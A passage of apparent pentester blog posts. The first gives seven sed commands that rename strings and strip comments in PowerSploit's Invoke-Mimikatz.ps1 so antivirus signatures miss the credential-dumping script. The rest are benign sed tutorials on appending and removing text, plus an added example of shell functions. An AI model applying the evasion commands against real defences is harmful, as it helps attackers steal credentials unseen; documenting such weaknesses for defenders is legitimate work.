Avoiding AV detection when running mimikatz with sed!

In this post I will be talking about avoiding AV detection when running mimikatz with sed! I came across this on the Black Hills Information Security website, link here. Props to Carrie Roberts for sharing this. The classic Invoke-Mimikatz.ps1 from the PowerSploit suite, located here, does get detected by many anti-virus vendors. That really is great for the enterprise. However, what's not so great is the way in which AV vendors are detecting it (by matching a handful of static strings in the script) and how easily that detection can be bypassed! Yes, AV can be bypassed simply by modifying the PowerShell file. Using 'sed' in bash we can swap out various text in the ps1 file, for example swapping out mimikatz for mimidogz as in line 1 below.

I have talked about slowing down attackers who are using mimikatz in this post. There we cover how to deny access to the clear-text credentials in early versions of Windows (up to Windows 7), and in later versions (Windows 8 and above) how to deny access to both the hash and the clear-text credentials. This will only slow attackers down, as the OS settings can still be modified, but doing so makes noise on the network. This really is a must for slowing down attackers. Harden your systems!

Below are the sed commands:

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1


Sed – Part 2 – Using Sed To remove text from a line in linux

How do we remove specific text from each line in a text file in Linux? In this post we cover using Sed to remove text from a line in Linux.

We previously covered in this post adding text to a line in Linux. In this post we will be specifically talking about the opposite. Using sed to remove text from a line in Linux is fairly straightforward. To remove specific characters or a portion of text from a line in Linux we can use the command-line bash tool sed. sed is used to perform basic text transformations; more info on sed can be found here. In the example below we want to remove 'BARRY\' from each line. The square brackets form a character class, so everything listed within them (each character in [text to remove]) is removed wherever it appears on the line, and we use:

sed 's/[BARRY\]//g'

example:

cat users | grep BARRY | cut -d" " -f 2 | sed 's/[BARRY\]//g'

Hopefully you will find this useful!

Sed – Part 1 – How to add a word/text to the end of each line of a file in Linux

Using sed to add text to the end of each line in Linux.

In this example we are going to use sed to add text to the end of each line in Linux, more specifically to each line of a text file, using a bash one-liner! Why would we want to do this? Multiple reasons if you're a penetration tester: creating user name lists or adding ports to the end of IP addresses, for example. sed is used to perform basic text transformations; you can read more about it here.

So for example, if we wanted to add ':80' to the end of each line of a list of IP addresses we would do the following:

sed 's/$/:80/' IP.txt > new_IP.txt

~$cat IP.txt 
192.168.0.1
192.168.0.2
192.168.0.3
192.168.0.4
192.168.0.5
~$sed 's/$/:80/' IP.txt > new_IP.txt
~$cat new_IP.txt 
192.168.0.1:80
192.168.0.2:80
192.168.0.3:80
192.168.0.4:80
192.168.0.5:80

Or if we found we wanted to add 'adm' to the end of each line in a list of user names, we would also use sed.

~$cat admins.txt 
adam
bob
bill
james
jane
~$sed 's/$/adm/' admins.txt > new_admins.txt
~$cat new_admins.txt 
adamadm
bobadm
billadm
jamesadm
janeadm
~$
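
Added example, not code from either of the original sed posts: the append idiom from Part 1 and the remove idiom from Part 2 wrapped as small shell functions that read stdin, so they drop into a pipeline like the ones above. It assumes POSIX sh with GNU or BSD sed; the remove_literal function is my own generalisation that escapes regex metacharacters, and all sample input is constructed here.

```shell
#!/bin/sh
# Added example (not from the original posts). Each function reads stdin and
# writes stdout. Sample inputs below are constructed for illustration.

# Part 1: append a suffix (":80", "adm", ...) to the end of every line.
# The pattern '$' anchors to end of line. Assumes the suffix contains none of
# the sed replacement metacharacters '/', '&' or '\'.
append_suffix() {
  sed "s/\$/$1/"
}

# Part 2, literal form (my generalisation): remove every occurrence of a fixed
# string. Regex metacharacters in the string are escaped first, so a Windows
# domain prefix such as 'BARRY\' is matched as written (the '\' becomes '\\').
remove_literal() {
  esc=$(printf '%s' "$1" | sed 's/[][\\.*^$\/]/\\&/g')
  sed "s/$esc//g"
}

# Part 2, bracket form exactly as in the post: '[BARRY\]' is a bracket
# expression, so sed deletes each listed character (B, A, R, Y and \)
# wherever it occurs on the line, not the sequence "BARRY\" as a whole.
remove_chars() {
  sed 's/[BARRY\]//g'
}

# Usage with constructed input: the two remove forms differ as soon as the
# user name itself contains one of the listed characters.
printf '%s\n' '192.168.0.1' '192.168.0.2' | append_suffix ':80'
printf '%s\n' 'BARRY\ADMIN' | remove_literal 'BARRY\'   # ADMIN
printf '%s\n' 'BARRY\ADMIN' | remove_chars              # DMIN
```

Use remove_chars when the field really is a fixed prefix made of characters that never occur in the rest of the line; otherwise remove_literal is the safer default.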

Having these small bash commands to hand is super useful. As a penetration tester I always find that I need to script something in Bash or PowerShell, or need to produce one-liners. Having these commands ready and waiting saves time looking them up. Hopefully you will also find them useful. Don't forget the man pages for bash commands. Practice, practice and more practice.